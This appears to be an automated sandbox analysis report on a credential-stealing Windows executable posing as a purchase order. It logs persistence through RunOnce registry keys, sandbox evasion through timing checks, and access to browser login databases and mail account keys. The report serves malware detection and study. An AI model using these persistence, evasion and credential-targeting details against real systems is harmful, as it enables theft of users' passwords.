            Source: C:\Users\user\Desktop\Purchase-Order27112024.scr.exeProcess created: C:\Users\user\Desktop\Purchase-Order27112024.scr.exe C:\Users\user\Desktop\Purchase-Order27112024.scr.exe /stext "C:\Users\user\AppData\Local\Temp\njgavgdycficoinvfolrymwhxifwkll"Jump to behavior
            Source: C:\Users\user\Desktop\Purchase-Order27112024.scr.exeProcess created: C:\Users\user\Desktop\Purchase-Order27112024.scr.exe C:\Users\user\Desktop\Purchase-Order27112024.scr.exe /stext "C:\Users\user\AppData\Local\Temp\xlmtozosqnagqojhoyykjqqygopfdwcbcs"Jump to behavior
            Source: C:\Users\user\Desktop\Purchase-Order27112024.scr.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Users\user\Desktop\Purchase-Order27112024.scr.exeSection loaded: version.dllJump to behavior
            Source: C:\Users\user\Desktop\Purchase-Order27112024.scr.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\Desktop\Purchase-Order27112024.scr.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Users\user\Desktop\Purchase-Order27112024.scr.exeSection loaded: shfolder.dllJump to behavior
            Source: C:\Users\user\Desktop\Purchase-Order27112024.scr.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\Desktop\Purchase-Order27112024.scr.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\Desktop\Purchase-Order27112024.scr.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Users\user\Desktop\Purchase-Order27112024.scr.exeSection loaded: riched20.dllJump to behavior
            Source: C:\Users\user\Desktop\Purchase-Order27112024.scr.exeSection loaded: usp10.dllJump to behavior
            Source: C:\Users\user\Desktop\Purchase-Order27112024.scr.exeSection loaded: msls31.dllJump to behavior
            Source: C:\Users\user\Desktop\Purchase-Order27112024.scr.exeSection loaded: textinputframework.dllJump to behavior
            Source: C:\Users\user\Desktop\Purchase-Order27112024.scr.exeSection loaded: coreuicomponents.dllJump to behavior
            Source: C:\Users\user\Desktop\Purchase-Order27112024.scr.exeSection loaded: coremessaging.dllJump to behavior
            Source: C:\Users\user\Desktop\Purchase-Order27112024.scr.exeSection loaded: ntmarta.dllJump to behavior
            Source: C:\Users\user\Desktop\Purchase-Order27112024.scr.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Users\user\Desktop\Purchase-Order27112024.scr.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Users\user\Desktop\Purchase-Order27112024.scr.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Users\user\Desktop\Purchase-Order27112024.scr.exeSection loaded: textshaping.dllJump to behavior
            Source: C:\Users\user\Desktop\Purchase-Order27112024.scr.exeSection loaded: version.dllJump to behavior
            Source: C:\Users\user\Desktop\Purchase-Order27112024.scr.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\Desktop\Purchase-Order27112024.scr.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\Desktop\Purchase-Order27112024.scr.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\Desktop\Purchase-Order27112024.scr.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Users\user\Desktop\Purchase-Order27112024.scr.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Users\user\Desktop\Purchase-Order27112024.scr.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Users\user\Desktop\Purchase-Order27112024.scr.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Users\user\Desktop\Purchase-Order27112024.scr.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Users\user\Desktop\Purchase-Order27112024.scr.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Users\user\Desktop\Purchase-Order27112024.scr.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Users\user\Desktop\Purchase-Order27112024.scr.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Users\user\Desktop\Purchase-Order27112024.scr.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Users\user\Desktop\Purchase-Order27112024.scr.exeSection loaded: winnsi.dllJump to behavior
            Source: C:\Users\user\Desktop\Purchase-Order27112024.scr.exeSection loaded: urlmon.dllJump to behavior
            Source: C:\Users\user\Desktop\Purchase-Order27112024.scr.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Users\user\Desktop\Purchase-Order27112024.scr.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Users\user\Desktop\Purchase-Order27112024.scr.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Users\user\Desktop\Purchase-Order27112024.scr.exeSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Users\user\Desktop\Purchase-Order27112024.scr.exeSection loaded: fwpuclnt.dllJump to behavior
            Source: C:\Users\user\Desktop\Purchase-Order27112024.scr.exeSection loaded: schannel.dllJump to behavior
            Source: C:\Users\user\Desktop\Purchase-Order27112024.scr.exeSection loaded: mskeyprotect.dllJump to behavior
            Source: C:\Users\user\Desktop\Purchase-Order27112024.scr.exeSection loaded: ntasn1.dllJump to behavior
            Source: C:\Users\user\Desktop\Purchase-Order27112024.scr.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Users\user\Desktop\Purchase-Order27112024.scr.exeSection loaded: dpapi.dllJump to behavior
            Source: C:\Users\user\Desktop\Purchase-Order27112024.scr.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Users\user\Desktop\Purchase-Order27112024.scr.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Users\user\Desktop\Purchase-Order27112024.scr.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Users\user\Desktop\Purchase-Order27112024.scr.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Users\user\Desktop\Purchase-Order27112024.scr.exeSection loaded: ncrypt.dllJump to behavior
            Source: C:\Users\user\Desktop\Purchase-Order27112024.scr.exeSection loaded: ncryptsslp.dllJump to behavior
            Source: C:\Users\user\Desktop\Purchase-Order27112024.scr.exeSection loaded: winmm.dllJump to behavior
            Source: C:\Users\user\Desktop\Purchase-Order27112024.scr.exeSection loaded: version.dllJump to behavior
            Source: C:\Users\user\Desktop\Purchase-Order27112024.scr.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Users\user\Desktop\Purchase-Order27112024.scr.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\Desktop\Purchase-Order27112024.scr.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\Desktop\Purchase-Order27112024.scr.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Users\user\Desktop\Purchase-Order27112024.scr.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Users\user\Desktop\Purchase-Order27112024.scr.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Users\user\Desktop\Purchase-Order27112024.scr.exeSection loaded: pstorec.dllJump to behavior
            Source: C:\Users\user\Desktop\Purchase-Order27112024.scr.exeSection loaded: vaultcli.dllJump to behavior
            Source: C:\Users\user\Desktop\Purchase-Order27112024.scr.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Users\user\Desktop\Purchase-Order27112024.scr.exeSection loaded: dpapi.dllJump to behavior
            Source: C:\Users\user\Desktop\Purchase-Order27112024.scr.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Users\user\Desktop\Purchase-Order27112024.scr.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\Desktop\Purchase-Order27112024.scr.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\Desktop\Purchase-Order27112024.scr.exeSection loaded: pstorec.dllJump to behavior
            Source: C:\Users\user\Desktop\Purchase-Order27112024.scr.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Users\user\Desktop\Purchase-Order27112024.scr.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Users\user\Desktop\Purchase-Order27112024.scr.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Users\user\Desktop\Purchase-Order27112024.scr.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\Desktop\Purchase-Order27112024.scr.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\Desktop\Purchase-Order27112024.scr.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Users\user\Desktop\Purchase-Order27112024.scr.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Users\user\Desktop\Purchase-Order27112024.scr.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Users\user\Desktop\Purchase-Order27112024.scr.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Users\user\Desktop\Purchase-Order27112024.scr.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Users\user\Desktop\Purchase-Order27112024.scr.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32Jump to behavior
            Source: C:\Users\user\Desktop\Purchase-Order27112024.scr.exeFile written: C:\Users\user\AppData\Local\Temp\tmc.iniJump to behavior
            Source: C:\Users\user\Desktop\Purchase-Order27112024.scr.exeFile opened: C:\Users\user\Desktop\Purchase-Order27112024.scr.cfgJump to behavior
            Source: C:\Users\user\Desktop\Purchase-Order27112024.scr.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager\AccountsJump to behavior
            Source: Purchase-Order27112024.scr.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

            Data Obfuscation

            barindex
            Source: C:\Users\user\Desktop\Purchase-Order27112024.scr.exeUnpacked PE file: 6.2.Purchase-Order27112024.scr.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.ndata:W;.rsrc:R; vs .MPRESS1:ER;.MPRESS2:ER;.rsrc:W;
            Source: C:\Users\user\Desktop\Purchase-Order27112024.scr.exeUnpacked PE file: 7.2.Purchase-Order27112024.scr.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.ndata:W;.rsrc:R; vs .MPRESS1:ER;.MPRESS2:ER;.rsrc:W;
            Source: C:\Users\user\Desktop\Purchase-Order27112024.scr.exeUnpacked PE file: 8.2.Purchase-Order27112024.scr.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.ndata:W;.rsrc:R; vs .MPRESS1:ER;.MPRESS2:ER;.rsrc:W;
            Source: Yara matchFile source: 00000000.00000002.2227487287.000000000872C000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: C:\Users\user\Desktop\Purchase-Order27112024.scr.exeCode function: 0_2_004062B2 GetModuleHandleA,LoadLibraryA,GetProcAddress,0_2_004062B2
            Source: C:\Users\user\Desktop\Purchase-Order27112024.scr.exeCode function: 0_2_10002DE0 push eax; ret 0_2_10002E0E
            Source: C:\Users\user\Desktop\Purchase-Order27112024.scr.exeCode function: 2_2_37002806 push ecx; ret 2_2_37002819
            Source: C:\Users\user\Desktop\Purchase-Order27112024.scr.exeCode function: 6_2_0044693D push ecx; ret 6_2_0044694D
            Source: C:\Users\user\Desktop\Purchase-Order27112024.scr.exeCode function: 6_2_0044DB70 push eax; ret 6_2_0044DB84
            Source: C:\Users\user\Desktop\Purchase-Order27112024.scr.exeCode function: 6_2_0044DB70 push eax; ret 6_2_0044DBAC
            Source: C:\Users\user\Desktop\Purchase-Order27112024.scr.exeCode function: 6_2_00451D54 push eax; ret 6_2_00451D61
            Source: C:\Users\user\Desktop\Purchase-Order27112024.scr.exeCode function: 7_2_0044B090 push eax; ret 7_2_0044B0A4
            Source: C:\Users\user\Desktop\Purchase-Order27112024.scr.exeCode function: 7_2_0044B090 push eax; ret 7_2_0044B0CC
            Source: C:\Users\user\Desktop\Purchase-Order27112024.scr.exeCode function: 7_2_00451D34 push eax; ret 7_2_00451D41
            Source: C:\Users\user\Desktop\Purchase-Order27112024.scr.exeCode function: 7_2_00444E71 push ecx; ret 7_2_00444E81
            Source: C:\Users\user\Desktop\Purchase-Order27112024.scr.exeCode function: 8_2_00414060 push eax; ret 8_2_00414074
            Source: C:\Users\user\Desktop\Purchase-Order27112024.scr.exeCode function: 8_2_00414060 push eax; ret 8_2_0041409C
            Source: C:\Users\user\Desktop\Purchase-Order27112024.scr.exeCode function: 8_2_00414039 push ecx; ret 8_2_00414049
            Source: C:\Users\user\Desktop\Purchase-Order27112024.scr.exeCode function: 8_2_004164EB push 0000006Ah; retf 8_2_004165C4
            Source: C:\Users\user\Desktop\Purchase-Order27112024.scr.exeCode function: 8_2_00416553 push 0000006Ah; retf 8_2_004165C4
            Source: C:\Users\user\Desktop\Purchase-Order27112024.scr.exeCode function: 8_2_00416555 push 0000006Ah; retf 8_2_004165C4

            Persistence and Installation Behavior

            barindex
            Source: C:\Users\user\Desktop\Purchase-Order27112024.scr.exeFile created: C:\Users\user\AppData\Local\Temp\subfolder1\Perissodactylic.scrJump to dropped file
            Source: C:\Users\user\Desktop\Purchase-Order27112024.scr.exeFile created: C:\Users\user\AppData\Local\Temp\nsl791D.tmp\System.dllJump to dropped file
            Source: C:\Users\user\Desktop\Purchase-Order27112024.scr.exeFile created: C:\Users\user\AppData\Local\Temp\subfolder1\Perissodactylic.scrJump to dropped file

            Boot Survival

            barindex
            Source: C:\Users\user\Desktop\Purchase-Order27112024.scr.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce Startup key C:\Users\user\AppData\Local\Temp\subfolder1\Perissodactylic.scrJump to behavior
            Source: C:\Users\user\Desktop\Purchase-Order27112024.scr.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce Startup key C:\Users\user\AppData\Local\Temp\subfolder1\Perissodactylic.scrJump to behavior
            Source: C:\Users\user\Desktop\Purchase-Order27112024.scr.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce Startup keyJump to behavior
            Source: C:\Users\user\Desktop\Purchase-Order27112024.scr.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce Startup keyJump to behavior
            Source: C:\Users\user\Desktop\Purchase-Order27112024.scr.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce Startup keyJump to behavior
            Source: C:\Users\user\Desktop\Purchase-Order27112024.scr.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce Startup keyJump to behavior
            Source: C:\Users\user\Desktop\Purchase-Order27112024.scr.exeCode function: 7_2_004047CB LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,7_2_004047CB
            Source: C:\Users\user\Desktop\Purchase-Order27112024.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Purchase-Order27112024.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Purchase-Order27112024.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Purchase-Order27112024.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Purchase-Order27112024.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Purchase-Order27112024.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Purchase-Order27112024.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Purchase-Order27112024.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Purchase-Order27112024.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Purchase-Order27112024.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Purchase-Order27112024.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Purchase-Order27112024.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Purchase-Order27112024.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Purchase-Order27112024.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

            Malware Analysis System Evasion

            barindex
            Source: C:\Users\user\Desktop\Purchase-Order27112024.scr.exeAPI/Special instruction interceptor: Address: 8F38F0A
            Source: C:\Users\user\Desktop\Purchase-Order27112024.scr.exeAPI/Special instruction interceptor: Address: 5BF8F0A
            Source: C:\Users\user\Desktop\Purchase-Order27112024.scr.exeRDTSC instruction interceptor: First address: 8EF7248 second address: 8EF7248 instructions: 0x00000000 rdtsc 0x00000002 test bx, cx 0x00000005 cmp ebx, ecx 0x00000007 jc 00007F8A8CEAF247h 0x00000009 push esi 0x0000000a mov esi, 3F0164E7h 0x0000000f cmp esi, 2Fh 0x00000012 jl 00007F8A8CEF1B12h 0x00000018 pop esi 0x00000019 inc ebp 0x0000001a inc ebx 0x0000001b rdtsc
            Source: C:\Users\user\Desktop\Purchase-Order27112024.scr.exeRDTSC instruction interceptor: First address: 5BB7248 second address: 5BB7248 instructions: 0x00000000 rdtsc 0x00000002 test bx, cx 0x00000005 cmp ebx, ecx 0x00000007 jc 00007F8A8CFED887h 0x00000009 push esi 0x0000000a mov esi, 3F0164E7h 0x0000000f cmp esi, 2Fh 0x00000012 jl 00007F8A8D030152h 0x00000018 pop esi 0x00000019 inc ebp 0x0000001a inc ebx 0x0000001b rdtsc
            Source: C:\Users\user\Desktop\Purchase-Order27112024.scr.exeCode function: 6_2_0040DD85 memset,CreateFileW,NtQuerySystemInformation,NtQuerySystemInformation,CloseHandle,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,NtQueryObject,CloseHandle,_wcsicmp,CloseHandle,6_2_0040DD85
            Source: C:\Users\user\Desktop\Purchase-Order27112024.scr.exeWindow / User API: threadDelayed 1099Jump to behavior
            Source: C:\Users\user\Desktop\Purchase-Order27112024.scr.exeWindow / User API: threadDelayed 8886Jump to behavior
            Source: C:\Users\user\Desktop\Purchase-Order27112024.scr.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsl791D.tmp\System.dllJump to dropped file
            Source: C:\Users\user\Desktop\Purchase-Order27112024.scr.exeAPI coverage: 4.3 %
            Source: C:\Users\user\Desktop\Purchase-Order27112024.scr.exeAPI coverage: 9.9 %
            Source: C:\Users\user\Desktop\Purchase-Order27112024.scr.exe TID: 4600Thread sleep count: 1099 > 30Jump to behavior
            Source: C:\Users\user\Desktop\Purchase-Order27112024.scr.exe TID: 4600Thread sleep time: -3297000s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Purchase-Order27112024.scr.exe TID: 4600Thread sleep count: 8886 > 30Jump to behavior
            Source: C:\Users\user\Desktop\Purchase-Order27112024.scr.exe TID: 4600Thread sleep time: -26658000s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Purchase-Order27112024.scr.exeCode function: 0_2_004057D0 CloseHandle,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,0_2_004057D0
            Source: C:\Users\user\Desktop\Purchase-Order27112024.scr.exeCode function: 0_2_0040628B FindFirstFileW,FindClose,0_2_0040628B
            Source: C:\Users\user\Desktop\Purchase-Order27112024.scr.exeCode function: 0_2_00402770 FindFirstFileW,0_2_00402770
            Source: C:\Users\user\Desktop\Purchase-Order27112024.scr.exeCode function: 2_2_00402770 FindFirstFileW,2_2_00402770
            Source: C:\Users\user\Desktop\Purchase-Order27112024.scr.exeCode function: 2_2_004057D0 CloseHandle,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,2_2_004057D0
            Source: C:\Users\user\Desktop\Purchase-Order27112024.scr.exeCode function: 2_2_0040628B FindFirstFileW,FindClose,2_2_0040628B
            Source: C:\Users\user\Desktop\Purchase-Order27112024.scr.exeCode function: 2_2_370010F1 lstrlenW,lstrlenW,lstrcatW,lstrlenW,lstrlenW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,2_2_370010F1
            Source: C:\Users\user\Desktop\Purchase-Order27112024.scr.exeCode function: 2_2_37006580 FindFirstFileExA,2_2_37006580
            Source: C:\Users\user\Desktop\Purchase-Order27112024.scr.exeCode function: 6_2_0040AE51 FindFirstFileW,FindNextFileW,6_2_0040AE51
            Source: C:\Users\user\Desktop\Purchase-Order27112024.scr.exeCode function: 7_2_00407EF8 FindFirstFileA,FindNextFileA,strlen,strlen,7_2_00407EF8
            Source: C:\Users\user\Desktop\Purchase-Order27112024.scr.exeCode function: 8_2_00407898 FindFirstFileA,FindNextFileA,strlen,strlen,8_2_00407898
            Source: C:\Users\user\Desktop\Purchase-Order27112024.scr.exeCode function: 6_2_00418981 memset,GetSystemInfo,6_2_00418981
            Source: Purchase-Order27112024.scr.exe, 00000002.00000002.4579842444.0000000006402000.00000004.00000020.00020000.00000000.sdmp, Purchase-Order27112024.scr.exe, 00000002.00000002.4579842444.00000000063D1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
            Source: Purchase-Order27112024.scr.exe, 00000002.00000002.4579842444.0000000006402000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWindows\system32\en-GB\mswsock.dll.mui
            Source: bhv2E52.tmp.6.drBinary or memory string: https://r.bing.com/rb/18/jnc,nj/6hU_LneafI_NFLeDvM367ebFaKQ.js?bu=Dx0ma3d6fXRucbIBtQEmpQEmuAE&or=w
            Source: C:\Users\user\Desktop\Purchase-Order27112024.scr.exeAPI call chain: ExitProcess graph end nodegraph_0-4739
            Source: C:\Users\user\Desktop\Purchase-Order27112024.scr.exeAPI call chain: ExitProcess graph end nodegraph_0-4740
            Source: C:\Users\user\Desktop\Purchase-Order27112024.scr.exeAPI call chain: ExitProcess graph end nodegraph_7-34119
            Source: C:\Users\user\Desktop\Purchase-Order27112024.scr.exeProcess information queried: ProcessInformationJump to behavior
            Source: C:\Users\user\Desktop\Purchase-Order27112024.scr.exeCode function: 2_2_37002639 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,2_2_37002639
            Source: C:\Users\user\Desktop\Purchase-Order27112024.scr.exeCode function: 6_2_0040DD85 memset,CreateFileW,NtQuerySystemInformation,NtQuerySystemInformation,CloseHandle,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,NtQueryObject,CloseHandle,_wcsicmp,CloseHandle,6_2_0040DD85
            Source: C:\Users\user\Desktop\Purchase-Order27112024.scr.exeCode function: 0_2_004062B2 GetModuleHandleA,LoadLibraryA,GetProcAddress,0_2_004062B2
            Source: C:\Users\user\Desktop\Purchase-Order27112024.scr.exeCode function: 2_2_37004AB4 mov eax, dword ptr fs:[00000030h]2_2_37004AB4
            Source: C:\Users\user\Desktop\Purchase-Order27112024.scr.exeCode function: 2_2_3700724E GetProcessHeap,2_2_3700724E
            Source: C:\Users\user\Desktop\Purchase-Order27112024.scr.exeProcess token adjusted: DebugJump to behavior
            Source: C:\Users\user\Desktop\Purchase-Order27112024.scr.exeCode function: 2_2_37002B1C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,2_2_37002B1C
            Source: C:\Users\user\Desktop\Purchase-Order27112024.scr.exeCode function: 2_2_37002639 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,2_2_37002639
            Source: C:\Users\user\Desktop\Purchase-Order27112024.scr.exeCode function: 2_2_370060E2 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,2_2_370060E2

            HIPS / PFW / Operating System Protection Evasion

            barindex
            Source: C:\Users\user\Desktop\Purchase-Order27112024.scr.exeSection loaded: NULL target: C:\Users\user\Desktop\Purchase-Order27112024.scr.exe protection: execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\Purchase-Order27112024.scr.exeSection loaded: NULL target: C:\Users\user\Desktop\Purchase-Order27112024.scr.exe protection: execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\Purchase-Order27112024.scr.exeSection loaded: NULL target: C:\Users\user\Desktop\Purchase-Order27112024.scr.exe protection: execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\Purchase-Order27112024.scr.exeProcess created: C:\Users\user\Desktop\Purchase-Order27112024.scr.exe "C:\Users\user\Desktop\Purchase-Order27112024.scr.exe"Jump to behavior
            Source: C:\Users\user\Desktop\Purchase-Order27112024.scr.exeProcess created: C:\Users\user\Desktop\Purchase-Order27112024.scr.exe C:\Users\user\Desktop\Purchase-Order27112024.scr.exe /stext "C:\Users\user\AppData\Local\Temp\lpbpuoswhxqpduzrodqpwzbywtn"Jump to behavior
            Source: C:\Users\user\Desktop\Purchase-Order27112024.scr.exeProcess created: C:\Users\user\Desktop\Purchase-Order27112024.scr.exe C:\Users\user\Desktop\Purchase-Order27112024.scr.exe /stext "C:\Users\user\AppData\Local\Temp\njgavgdycficoinvfolrymwhxifwkll"Jump to behavior
            Source: C:\Users\user\Desktop\Purchase-Order27112024.scr.exeProcess created: C:\Users\user\Desktop\Purchase-Order27112024.scr.exe C:\Users\user\Desktop\Purchase-Order27112024.scr.exe /stext "C:\Users\user\AppData\Local\Temp\xlmtozosqnagqojhoyykjqqygopfdwcbcs"Jump to behavior
            Source: Purchase-Order27112024.scr.exe, 00000002.00000002.4579842444.00000000063E6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager
            Source: Purchase-Order27112024.scr.exe, 00000002.00000002.4580003040.0000000006415000.00000004.00000020.00020000.00000000.sdmp, Purchase-Order27112024.scr.exe, 00000002.00000003.2556975823.000000000641B000.00000004.00000020.00020000.00000000.sdmp, Purchase-Order27112024.scr.exe, 00000002.00000003.2541293582.000000000641B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: |Program Manager|
            Source: Purchase-Order27112024.scr.exe, 00000002.00000002.4579842444.00000000063E6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager4L>
            Source: C:\Users\user\Desktop\Purchase-Order27112024.scr.exeCode function: 2_2_37002933 cpuid 2_2_37002933
            Source: C:\Users\user\Desktop\Purchase-Order27112024.scr.exeQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Purchase-Order27112024.scr.exeCode function: 2_2_37002264 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,2_2_37002264
            Source: C:\Users\user\Desktop\Purchase-Order27112024.scr.exeCode function: 7_2_004082CD memset,memset,memset,memset,GetComputerNameA,GetUserNameA,MultiByteToWideChar,MultiByteToWideChar,MultiByteToWideChar,strlen,strlen,memcpy,7_2_004082CD
            Source: C:\Users\user\Desktop\Purchase-Order27112024.scr.exeCode function: 0_2_00405F6A GetVersion,GetSystemDirectoryW,GetWindowsDirectoryW,SHGetSpecialFolderLocation,SHGetPathFromIDListW,CoTaskMemFree,lstrcatW,lstrlenW,0_2_00405F6A
            Source: C:\Users\user\Desktop\Purchase-Order27112024.scr.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

            Stealing of Sensitive Information

            barindex
            Source: Yara matchFile source: 00000002.00000003.2541293582.000000000641B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.4580003040.0000000006415000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000003.2556975823.000000000641B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.4579842444.00000000063E6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000003.2541332052.000000000641B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: Purchase-Order27112024.scr.exe PID: 4892, type: MEMORYSTR
            Source: C:\Users\user\Desktop\Purchase-Order27112024.scr.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
            Source: C:\Users\user\Desktop\Purchase-Order27112024.scr.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
            Source: C:\Users\user\Desktop\Purchase-Order27112024.scr.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\places.sqliteJump to behavior
            Source: C:\Users\user\Desktop\Purchase-Order27112024.scr.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
            Source: C:\Users\user\Desktop\Purchase-Order27112024.scr.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\key4.dbJump to behavior
            Source: C:\Users\user\Desktop\Purchase-Order27112024.scr.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
            Source: C:\Users\user\Desktop\Purchase-Order27112024.scr.exeKey opened: HKEY_CURRENT_USER\Software\Google\Google Talk\AccountsJump to behavior
            Source: C:\Users\user\Desktop\Purchase-Order27112024.scr.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\IdentityCRL\Dynamic SaltJump to behavior
